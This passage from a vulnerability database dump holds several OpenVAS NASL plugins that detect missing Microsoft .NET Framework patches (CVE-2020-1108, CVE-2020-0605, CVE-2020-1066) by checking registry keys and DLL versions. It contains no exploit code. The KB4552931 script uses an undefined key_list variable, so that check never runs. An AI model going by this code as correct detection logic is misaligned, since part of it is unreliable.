with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817116\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552928)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552928\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552928\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:10", "description": "This host is missing a critical security\n update according to Microsoft KB4552929", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552929)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817106", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817106", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817106\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552929)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552929\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552929/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:10", "description": "This host is missing a critical security\n update according to Microsoft KB4552931", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552931)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817104", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817104", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817104\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4552931)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4552931\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4552931\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.9148\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.9148\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:12", "description": "This host is missing a critical security\n update according to Microsoft KB4556401", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4556401)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817100", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817100\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4556401)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4556401\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to conduct a denial-of-service condition and run arbitrary code in the context\n of the current user. If the current user is logged on with administrative user\n rights, an attacker could take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4556401\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n if(vulnerable_range){\n break;\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552982/kb4552982\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552946/kb4552946\n else if(version_in_range(version:dllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36626\";\n break;\n }\n # https://support.microsoft.com/en-us/help/4552923/kb4552923\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\";\n break;\n }\n ## https://support.microsoft.com/en-us/help/4552933/kb4552933\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\";\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:11", "description": "This host is missing a critical security\n update according to Microsoft KB4556399", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4556399)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817103", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817103\");\n script_version(\"2020-06-09T06:40:15+0000\");\n script_cve_id(\"CVE-2020-1108\", \"CVE-2020-0605\", \"CVE-2020-1066\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 06:40:15 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-13 09:18:00 +0530 (Wed, 13 May 2020)\");\n script_name(\"Microsoft .NET Framework Multiple Vulnerabilities (KB4556399)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4556399\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework improperly handles web requests.\n\n - An error in how .NET Framework activates COM objects.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain escalated privileges, conduct a denial-of-service condition and run\n arbitrary code in the context of the current user. If the current user is logged\n on with administrative user rights, an attacker could take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4556399/kb4556399\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : 